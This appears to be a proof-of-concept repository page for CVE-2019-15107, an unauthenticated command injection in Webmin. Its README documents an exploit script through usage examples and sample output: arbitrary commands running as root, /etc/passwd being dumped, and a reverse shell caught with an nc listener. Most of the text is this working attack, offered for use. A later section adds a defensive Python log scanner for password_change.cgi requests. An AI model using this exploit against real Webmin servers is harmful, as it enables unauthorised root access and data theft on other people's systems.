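Related vulnerability
Title:
Webmin OS command injection vulnerability
(CVE-2019-15107)
Description: Webmin is a web-based system administration tool for Unix-like operating systems. password_change.cgi in Webmin 1.920 and earlier contains an OS command injection vulnerability. The vulnerability arises because the network system or product does not properly filter special elements when constructing an executable command from external input data. An attacker can exploit this vulnerability to execute unauthorized commands.
Description
CVE-2019-15107 Webmin unauthenticated RCE
Introduction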
# CVE-2019-15107 Webmin 1.890 Unauthenticated Remote Code Execution
This script is designed to exploit the unauthenticated command execution vulnerability in Webmin 1.890. It allows you to execute arbitrary commands on a target Webmin server or to obtain a reverse shell.
## Usage
The exploit takes 5 arguments:
```bash
$ python3 test.py -h
usage: test.py [-h] -i IP Address [-p Port number] [-c Command] [--shell] [-x]

Exploit unauthenticated command execution in Webmin 1.890.

options:
  -h, --help            show this help message and exit

required arguments:
  -i IP Address, --ip IP Address
                        Target ip address

optional arguments:
  -p Port number, --port Port number
                        Webmin port(default=10000)
  -c Command, --command Command
                        OS Command to execute (Default=id)
  --shell               Get a reverse shell
  -x, --proxy           Sends requests through Burp Suite proxy at 127.0.0.1:8080.

Example:
    python exploit.py -i 192.168.1.100
    python exploit.py -i 192.168.1.100 -p 10000 -c whoami
    python exploit.py -i 192.168.1.100 -x -c "ls -la"
    python exploit.py -i 192.168.1.100 --shell
```
The only required option is `-i`, which is the IP address of the target.
Running the exploit with only `-i` executes the command `id` against the target on the default port `10000`:
```bash
$ python3 exploit.py -i 10.200.105.200
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
```
### Command execution
You can specify what command to run using the `-c` or `--command` options:
```bash
$ python3 exploit.py -i 10.200.105.200 -c 'cat /etc/passwd'
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
[...]
```
### Reverse shell
You can also get a reverse shell by using the `--shell` option.
> You will be prompted to enter your IP address and the listening port:
```bash
$ python3 exploit.py -i 10.200.105.200 --shell
Enter your ip address: 10.50.106.33
Enter your listening port: 9001
[+] Sending a shell to 10.50.106.33:9001...
```
```bash
$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.50.106.33] from (UNKNOWN) [10.200.105.200] 41446
[root@prod-serv ]#
```
### Proxy
By adding the `-x` or `--proxy` option, you can send the request through a Burp Suite proxy at 127.0.0.1:8080.
## References
<https://nvd.nist.gov/vuln/detail/cve-2019-15107>
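For defenders: the description above names `password_change.cgi` as the vulnerable endpoint, so requests to it in the Webmin access log are worth reviewing, especially ones with no authenticated user. The following is an added example, not part of the original repository; it assumes a Common Log Format-style access log, and the function name `find_password_change_hits` and all sample log lines are constructed for illustration.

```python
import re

# Assumption: the access log uses Common Log Format
# (src ident user [timestamp] "METHOD path PROTO" status bytes).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})\b'
)
ENDPOINT = "/password_change.cgi"  # endpoint named in the CVE description

def find_password_change_hits(lines):
    """Return {source: [(timestamp, method, user, status), ...]} for
    every request whose path resolves to the password_change.cgi endpoint."""
    hits = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request record
        # Compare the path only: drop the query string, collapse leading
        # slashes, and ignore case so trivial variations still match.
        path = "/" + m["path"].split("?", 1)[0].lstrip("/")
        if path.lower() == ENDPOINT:
            hits.setdefault(m["src"], []).append(
                (m["ts"], m["method"], m["user"], int(m["status"]))
            )
    return hits

# Constructed sample log lines (documentation address ranges).
SAMPLE_LOG = [
    '192.0.2.10 - admin [20/Aug/2019:10:01:02 +0000] "GET /sysinfo.cgi HTTP/1.1" 200 5120',
    '198.51.100.7 - - [20/Aug/2019:10:03:44 +0000] "POST /password_change.cgi HTTP/1.1" 200 812',
    '198.51.100.7 - - [20/Aug/2019:10:03:51 +0000] "POST //password_change.cgi?x=1 HTTP/1.1" 200 640',
    '192.0.2.10 - admin [20/Aug/2019:10:05:00 +0000] "GET /session_login.cgi HTTP/1.1" 200 2048',
    'this line is not a request record',
]

if __name__ == "__main__":
    for src, events in find_password_change_hits(SAMPLE_LOG).items():
        for ts, method, user, status in events:
            auth = "unauthenticated" if user == "-" else f"user={user}"
            print(f"{src} [{ts}] {method} {ENDPOINT} -> {status} ({auth})")
```

A hit is a lead for review, not proof of exploitation; correlate it with the installed Webmin version and with process activity on the host at the same timestamp.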
File snapshot
[4.0K] /data/pocs/ca4d79f0ebca5eb1fb6915d5764a29a607011626
├── [3.2K] exploit.py
└── [2.4K] README.md
0 directories, 2 files